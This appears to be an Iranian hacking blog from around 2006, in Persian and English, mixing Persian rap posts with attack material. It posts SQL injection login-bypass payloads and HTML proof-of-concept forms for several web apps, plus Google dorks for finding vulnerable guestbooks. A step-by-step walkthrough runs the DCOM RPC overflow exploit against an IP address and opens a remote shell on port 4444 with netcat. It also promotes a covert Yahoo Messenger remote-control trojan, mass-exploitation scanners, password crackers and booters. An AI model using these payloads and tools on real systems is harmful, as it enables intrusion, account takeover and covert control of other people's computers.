تبليغاتX
<-(Terror Hellish) Trojan.Hack Tools.Mardom Azari.Boot......->

                      

   
Menu
 
 
 
 
Archive
       
YahOO!ID
 
Forums
 
 
 
Pages Web
 
Fonts terror
 
Download Terror
 
Link
 
Fonts terror
 
Download Terror
 
 
 

 

 

 

 







 
 




?

SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1

SQL Injection in include.php?path=login/member.php

The parameters usernick and letters are vulnerable to SQL Injections.
POC:
/phpkit/include.php?path=login/member.php&letter=phuket'%20AND%20MID(use
r_pw,1,1)='8'/*

This will show the user "phuket" if the first character of his password
hash is '8'.

SQL Injection in include.php?path=login/imcenter.php

منبع : securityfocus.com

 


?

Happy New Years

 وبلاگ جون تولدت مبارک

 

 


?

SQL injection in VGM Forbin
 #######################################
# Www.H4ckerz.coM --- Www.Hackerz.iR #
#######################################
**************************************************

Vendor : VGM Forbin
Target Page : resource/products/adm/login.asp
Action : Turn back too default.asp

Exploit :
              Username : admin'-'
              Password : 'x' or '1'--

###############################################
H4ckerZ Researching Team

Greetz : Hessam-X , Ro0X , and other iranian hackerZ ;-)
!!!!!!!!!!!!!!!!!!!!!!!!
DevilZ Z0ne Member
!!!!!!!!!!!!!!!!!!!!!!!!
Received on Mar 27 2006

 

 


?

بعد اولین قسمت ژورنال سریز بافر

با کاملتر کردن قسمت اول به مباحث جدیدتری هم پرادختم تا یک ژورنال در سطح پیشرفته و کاری قابل قبول باشه!
مباحث:
پیشه چیست؟
انواع پشته؟
پشته از دید ماهیت و Sp ؟
بافر چیست؟
ساختار بافر؟
هیپ چیست؟
سریز بافر!
چگونگی سریز و کدهای مخرب
زیر ریز بافر چیست؟
چگونگی این خطا در بافر؟
کدها و سورس ها برای زیر ریز؟
و نمونه برنامه ها برای خطا های بافر
چگونگی شل کد نوشتن و .....
از مقاله PDF بوده و با Acrobat Reader باز میشود
نویسنده: Satanic Soulful

Download

منبع : شیطان جهنمی

 


?

TroMessenger

با اين برنامه مي توانيد كامپيوتر ديگري را از طريق ياهو مسنجر كنترل كنيد.

بدين صورت كه: اين برنامه يك آي دي روبات ياهو به طور مخفيانه در كامپيوتر طرف آنلاين مي كند كه شما با PM دادن به آن، مي توانيد دستورات مورد نظر خود را اجرا كنيد. مثلا:

/cmd dir *.txt
/cmd ipconfig /all
/date /time
/ip /osname /winusername

كه براي گرفتن اطلاعات مختلف از كامپيوتر هدف به كار مي روند.

ضمنا به دليل استقبال كشورهاي خارجي از اين برنامه و همچنين برقراري رابطه دوستي با اين كشورها، از جمله روماني، پاكستان و كشورهاي عربي، تصميم گرفتيم راهنماي اين برنامه را به اين چند زبان نيز عرضه كنيم. البته راهنماي هندي و تركي آن نيز به زودي آماده مي شود.

براي دانلود اين برنامه و ديدن توضيحات آن، از لينك زير استفاده كنيد:

http://www.sma-soft.ir/TroMessenger/

ضمنا نسخه جدید ترومسنجر هم آماده دانلود می باشد. که از آدرس زیر می توانید دانلود کنید:

http://www.sma-soft.ir/downloads/?u=TroMessenger

  Sma-Soft:منبع

 


?

این برنامه واسه محدود کردن سیستم های کافی به کار میره

Download

 

 


?

" سایت رسمی رپ فارسی "

http://www.lord.ir

در تالار گفتگو سایت عضو شوید و ....

 

 


?

Advanced Guestbook 2.2

بچه ها این یک Qury هست ! که من اینو به اچ تی ام ال تبدیل کردم که کاره شما برای هک کردن Guestbook سایت های پی اچ پی راخت بشه!

احتیاج به توضیح نداره ! فقط از لینک زیر دانلود کنید

برای پیدا کردن یه همچین سایت های که بشه هک کرد  تو گوگل سرچ کنید !!

powered by admin.php guestbook

یا هر چیز دیگری که میتونه این جور سایت ها رو پیدا کنه .
شکل آدرس سایت هم میتونه به شکل ها ی زیر باشه ( البته این چند نمونش هست )
http://www.example.com/guests/admin.php
http://www.example.com/guestbookludt/admin.php
http://www.example.com/comments/admin.php
و ...........

ولی بچه ها من این پست رو یه باره دیگه داده بودم تو همین جا ولی حالا خودم تبدیلش کردم به اچ تی ام ال

Thank u Arash

Download Html

 


?

برنامه ای برای هک کردن سایت های هاستینگ کنترولر

این برنامه رو خودم نوشتم ! و میتونید از لینک زیر دانلود کنید

البته باید بگم که قول نمیدم دیگه سایت های زیادی HC زیادی برای هک کردن باشه .

ولی خوب ...

Download

 

 


?

سورس برنامه ی Buddy Spy 

خوب شاید برخی از شما نام نرم افزار Buddy Spy رو شنیده باشید , اگر هم نشنیده اید خوب من براتون می گم . کاربرد این برنامه برای Yahoo Messanger هست , مثلا شما می خواهید دیگران فکر کنند که شما WebCam دارید یا اینکه بفهمید یک شخص خاصی واقعاً invisible هست یا نه و اینکه شخص مورد نظر شما در Room های یاهو هست یانه و ..... . خوب این برنامه با ویژوال بیسیک نوشته شده و آقای Brandon Henricks لطف کردن و سورس این برنامه را بصورت Free و تحت GNU Licence عرضه کرده اند .

دریافت Source برنامه

 


?

فيلم آموزش کامپايل کردن اکسپلويت به زبان پرل

لینک فیلم: http://www.satanic.persiangig.com/video/perl.rar
570 کیلوبایت هست
برنامه های مورد نیاز:
اکتیو پرل Active Perl
با توجه به پلت فورم که دارید اکتیو پرل رو دانلود کنید(اگر لینوکس هستید لینوکس اگر ویندوز هستید ویندوز)
از سایت زیر میتونید دانلود کنید(اول سیستم عامل تون رو مشخص کنید بد اکتیو پرل رو دانلود کنید) : http://downloads.activestate.com/ActivePerl/
من از این نسخه استفاده میکنم : ActivePerl-5.6.1.638-MSWin32-x86
-------------------------------------------------------------------------------

در صورت دانلود نشدن از سايت زير دانلود کنيد: Simorgh-ev.com/clip

  منبع : گروه هکینگ و امنیتی جهنم شیطانی

 

 


?

آخرين ويرايش ابزار شنود و حمله Cain & Abel - 2.8.1

يك برنامه بسيار قوي و جالب در زمينه Recovery كردن پسوردها است كه براي سيستم عامل هاي ويندوز نوشته شده است. اين ابزار براحتي اجازه Recovery كردن انواع مختلف پسوردها را به وسيله Sniff كردن شبكه, Crack كردن پسوردهاي رمزنگاري شده با استفاده از روش Dictionary Attack و Brute-Force و همينطور Decode كردن پسوردهاي Hash شده و MD5 و scramble را براي شما انجام مي دهد. از امكانات ديگر اين برنامه كشف و پيدا كردن پسوردهاي Cache و آناليز كردن پروتكل هاي Router ها و مسيريابي آنها مي باشد. اين نكته را ذكر كنيم كه اكثر هكرها براي Crack كردن پسوردهاي MD5 مثل پسوردهاي User هاي فروم هايي مثل PHPBB از اين برنامه استفاده مي كنند. اين برنامه كاري از تيم Massimiliano Montoro مي باشد.

Download Cain 2.8.1

 منبع : گروه هکینگ و امنیتی جهنم شیطانی

 


?

Persian Rapper

خوب بچه ها آهنگ رپ من به نام *شاخ شکون* کامل شده و آماده دانلود میباشد!
آهنگو در سایت دوستم آپلود کردم و سرعتش خوبه
میتونید آهنگو دانلود کنید !

Download Music Rap Satanic

 


?

تازگيها پرشين رپ طرفدارای زيادی پيدا کرده ، خود من هم آهنگام تا ۲ یا ۳ هفته دیگه میاد رو نت لقبمم  SATANIC هست

Change                                               Dariya

Style Rap                              Eblis Ft Nergal

Gheseye Eshgh                              Kami Mc

3P Ma                                               Hich Kas

Irane man                             Hesam Steps

Hayfe Vazheye Khiyanat             Emziper

tanhayi                                          Rap Knot

Faramoosh                                             Pani

Daffing                         Eblis & Tohi Ft.Yar2

Iran                                                  Kami Mc

 


?

 Advanced Guestbook 2.2 SQL Injection Exploit

سلام دوستان
شما با استفاده از این اکسپولیت GuestBook سایت های Admin.php رو بزنید

در گوگل این رو سرچ کنید >>
powered by admin.php guestbook
یا هر چیز دیگری که میتونه این جور سایت ها رو پیدا کنه .
شکل آدرس سایت هم میتونه به شکل ها ی زیر باشه ( البته این چند نمونش هست )
http://www.example.com/guests/admin.php
http://www.example.com/guestbookludt/admin.php
http://www.example.com/comments/admin.php
و ...........
حالا وقتی وارد این صفحه های لوگین ادمین شدید در قسمت Username فقط
......!
کد:
UserName: ' or 1=1 /*

و در قسمت پسورد هم هیچی ننویسید
موفق باشید

 


?

Techno Dreams Scripts SQL injection

SQL injection

-------

حفره ي جديد در برنامه Techno Dreams توسط كانون پژوهشگران دانش امنيت (تيم امنيتي پرشين هكرز سابق) كشف شد.

تاریخ کشف:
31 مهر 1384

درباره برنامه:
Techno Dreams مجموعه برنامه هايي روي وب است كه شامل Announcement - Guestbook - Mailing List - WebDirectory مي باشد.
برای کسب اطلاعات بیشتر به سایت: Techno Dreams مراجعه کنید.

شرح :
----------------
آسيب پذيري موجود در اين مجموعه برنامه ها به نفوذ گر اين اجازه را مي دهد كه كدها خطرناكي را روي بانك اطلاعاتي اجرا كند در نتيجه مي تواند به اطلاعات پر اهميت دسترسي پيدا كند.

آسیب پذیری :
--------------------

<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/admin/login.asp">
<input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/login.asp">
<input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>



راهکار امنیتی :
--------------------
هيچ راهكار امنيتي درحال حاضر موجود نيست.


اطلاعات بیشتر :
--------------------
http://www.securityfocus.com/archive/1/414708/30/0/threaded
http://www.securityfocus.com/bid/15215

 


?

آموزش نفوذ به كامپيوتر ديگران به وسيله ي Dcom32

شما ابتدا دو قابل زیر را دانلود کنید و در درایو C خود کپی کنید

Dcom32

NetCat

حالا به Run رفته cmd رو تایپ کنید و بعد اینتر حالا به این صورت زیر عمل کنید >>>
C:\>dcom32
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Ported to Win32 by Benjamin Lauziكre <blauziere [at] altern.org>
- Usage: dcom32 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)

همونطور که میبینید این اکسپولیت تا سرویس پک 1 قابل اجراست .
حالا ما آی پی طرف مقابل رو داریم میخوایم با استفاده از این اکسپولیت از کامپیوترش شل بگیریم.
به صورت زیر عمل کنید>>>

C:\>dcom32 6 81.12.13.27
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Ported to Win32 by Benjamin Lauziكre <blauziere [at] altern.org>
- Using return address of 0x77e626ba
Use Netcat to connect to 81.12.27.119:4444

اینی که با خط نارنجی مشخص کردم اینو میگه که پورت 4444 رو این آی پی باز شده و شما میتونید به وسیله نتکت از اون کامپیوتر شل بگیریم

برای شل به وسیله نتکت به این صورت عمل کنید >>>

C:\>nc\nc -vvv 81.12.27.119 4444


و اگر به کامپیوتر طرف وصل بشید خط فرمان زیر را برای شما باز میکنه :

C:\WINDOWS\system32>

 


?

 سایت  دیفیس شده

http://www.crownmax.org

 


?

Exploite

با کمک این exploit که از باگ dcom استفاده می کند می توانید روی یک رنج ip بدون انجام هیچ کاری وارد سیستم قربانی شوید .بدون داشتن هیچ اطلاعاتی از هک و ارتباط قبلی با قربانی .البته این باگ ازباگ های قدیمیه ولی هنوز کار می کنه و چون می خواستیم که شروعی باشه برای ارائه ی باگ های کامپایل شده ی جدید که بزودی تو سایت ارائه می شه . برای کار با این باگ بعد از داونلود در درایو c خودتون کپیش کنید و بعد به منوی استارت برید و در run رفته cmd را تایپ کنید .بعد از ورود به cmd و با داشتن ip خود به طور مثال ip من 217.218.190.55 هستش میرم تو command prompt مینویسم C:>kaht2.exe 217.218.190.1 217.218.190.254 که با این کار برنامه این رنج را برای پیدا کردن سیستم های نفوذ پذیر چک می کند و وارد آن ها می شود و خط فرمان آن ها را در اختیار شما قرار می دهد (از آن ها شل می گیرد

Download 

 


?

مقاله ی بوت کردن در یاهو نوشته شد. و تعدادی بوتر که قبلا توسط خودم امتحان شده و کار هم میکنه واسه دانلود گذاشتم برای دیدن بقیه مطالب بوت در یاهو روی ادامه ی متن کلیک کنید

ادامه متن...